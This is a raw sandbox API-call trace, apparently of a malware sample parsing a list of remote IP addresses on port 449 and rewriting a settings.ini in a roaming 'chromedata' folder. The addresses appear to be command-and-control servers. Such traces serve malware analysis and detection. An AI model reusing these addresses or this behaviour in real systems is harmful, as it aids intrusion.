	[0201.893] lstrcpynW (in: lpString1=0x26cae88, lpString2="131.161.252.141:449", iMaxLength=16 | out: lpString1="131.161.252.141") returned="131.161.252.141"
	[0201.893] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.893] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.893] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.893] StrStrIW (lpFirst="181.129.20.250:449", lpSrch=":") returned=":449"
	[0201.893] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.129.20.250:449", iMaxLength=15 | out: lpString1="181.129.20.250") returned="181.129.20.250"
	[0201.893] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.894] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.894] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.894] StrStrIW (lpFirst="181.209.88.26:449", lpSrch=":") returned=":449"
	[0201.894] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.209.88.26:449", iMaxLength=14 | out: lpString1="181.209.88.26") returned="181.209.88.26"
	[0201.894] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.894] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.894] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.894] StrStrIW (lpFirst="186.159.2.153:449", lpSrch=":") returned=":449"
	[0201.894] lstrcpynW (in: lpString1=0x26cae88, lpString2="186.159.2.153:449", iMaxLength=14 | out: lpString1="186.159.2.153") returned="186.159.2.153"
	[0201.894] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.895] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.895] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.895] StrStrIW (lpFirst="136.25.2.43:449", lpSrch=":") returned=":449"
	[0201.895] lstrcpynW (in: lpString1=0x26cae88, lpString2="136.25.2.43:449", iMaxLength=12 | out: lpString1="136.25.2.43") returned="136.25.2.43"
	[0201.895] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.895] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.895] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.895] StrStrIW (lpFirst="190.128.82.34:449", lpSrch=":") returned=":449"
	[0201.895] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.128.82.34:449", iMaxLength=14 | out: lpString1="190.128.82.34") returned="190.128.82.34"
	[0201.895] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.895] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.895] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.896] StrStrIW (lpFirst="181.176.218.86:449", lpSrch=":") returned=":449"
	[0201.896] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.176.218.86:449", iMaxLength=15 | out: lpString1="181.176.218.86") returned="181.176.218.86"
	[0201.896] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.896] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.896] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.896] StrStrIW (lpFirst="181.129.137.170:449", lpSrch=":") returned=":449"
	[0201.897] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.129.137.170:449", iMaxLength=16 | out: lpString1="181.129.137.170") returned="181.129.137.170"
	[0201.897] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.897] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.897] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.897] StrStrIW (lpFirst="37.255.200.157:449", lpSrch=":") returned=":449"
	[0201.897] lstrcpynW (in: lpString1=0x26cae88, lpString2="37.255.200.157:449", iMaxLength=15 | out: lpString1="37.255.200.157") returned="37.255.200.157"
	[0201.897] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.897] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.897] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.898] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0201.898] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff7f8
	[0201.898] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff750, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
	[0201.898] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7f8, Size=0x10) returned 0x22ff840
	[0201.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8cc0) returned 1
	[0201.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0201.898] GetFileAttributesW (lpFileName="settings.ini" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\settings.ini")) returned 0x2020
	[0201.898] CreateFileW (lpFileName="settings.ini" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\settings.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0201.899] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x478f
	[0201.899] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0201.899] ReadFile (in: hFile=0x534, lpBuffer=0x26cec08, nNumberOfBytesToRead=0x478f, lpNumberOfBytesRead=0x1294ac, lpOverlapped=0x0 | out: lpBuffer=0x26cec08*, lpNumberOfBytesRead=0x1294ac*=0x478f, lpOverlapped=0x0) returned 1
	[0201.900] CloseHandle (hObject=0x534) returned 1
	[0201.900] CreateFileW (lpFileName="settings.ini" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0201.901] WriteFile (in: hFile=0x534, lpBuffer=0x26cec08*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cec08*, lpNumberOfBytesWritten=0x129420*=0xc, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x26cec16*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cec16*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x26cec3c*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cec3c*, lpNumberOfBytesWritten=0x129420*=0x30, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x26cec6e*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cec6e*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0201.902] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26cecb4*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cecb4*, lpNumberOfBytesWritten=0x129420*=0x41, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26cecf7*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cecf7*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26ced24*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ced24*, lpNumberOfBytesWritten=0x129420*=0x47, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26ced6d*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ced6d*, lpNumberOfBytesWritten=0x129420*=0x35, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26ceda4*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ceda4*, lpNumberOfBytesWritten=0x129420*=0x4b, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26cedf1*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cedf1*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26cee08*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cee08*, lpNumberOfBytesWritten=0x129420*=0x3d, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.903] WriteFile (in: hFile=0x534, lpBuffer=0x26cee47*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cee47*, lpNumberOfBytesWritten=0x129420*=0x2d, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26cee76*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cee76*, lpNumberOfBytesWritten=0x129420*=0x29, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26ceea1*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ceea1*, lpNumberOfBytesWritten=0x129420*=0x17, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26ceeba*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ceeba*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26cef0f*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cef0f*, lpNumberOfBytesWritten=0x129420*=0x22, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26cef33*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cef33*, lpNumberOfBytesWritten=0x129420*=0x18, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26cef4d*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cef4d*, lpNumberOfBytesWritten=0x129420*=0x1f, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x26cef6e*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cef6e*, lpNumberOfBytesWritten=0x129420*=0x31, lpOverlapped=0x0) returned 1
	[0201.904] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cefa1*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cefa1*, lpNumberOfBytesWritten=0x129420*=0x36, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cefd9*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cefd9*, lpNumberOfBytesWritten=0x129420*=0x26, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf001*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf001*, lpNumberOfBytesWritten=0x129420*=0x39, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf03c*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf03c*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf081*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf081*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf0a7*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf0a7*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf0c6*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf0c6*, lpNumberOfBytesWritten=0x129420*=0x50, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.905] WriteFile (in: hFile=0x534, lpBuffer=0x26cf118*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf118*, lpNumberOfBytesWritten=0x129420*=0x21, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf13b*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf13b*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf180*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf180*, lpNumberOfBytesWritten=0x129420*=0x11, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf193*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf193*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf1e6*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf1e6*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf20c*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf20c*, lpNumberOfBytesWritten=0x129420*=0x17, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf225*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf225*, lpNumberOfBytesWritten=0x129420*=0x55, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x26cf27c*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf27c*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0201.906] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf2a2*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf2a2*, lpNumberOfBytesWritten=0x129420*=0x3e, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf2e2*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf2e2*, lpNumberOfBytesWritten=0x129420*=0x3d, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf321*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf321*, lpNumberOfBytesWritten=0x129420*=0x29, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x26cf34c*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26cf34c*, lpNumberOfBytesWritten=0x129420*=0x48, lpOverlapped=0x0) returned 1
	[0201.907] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
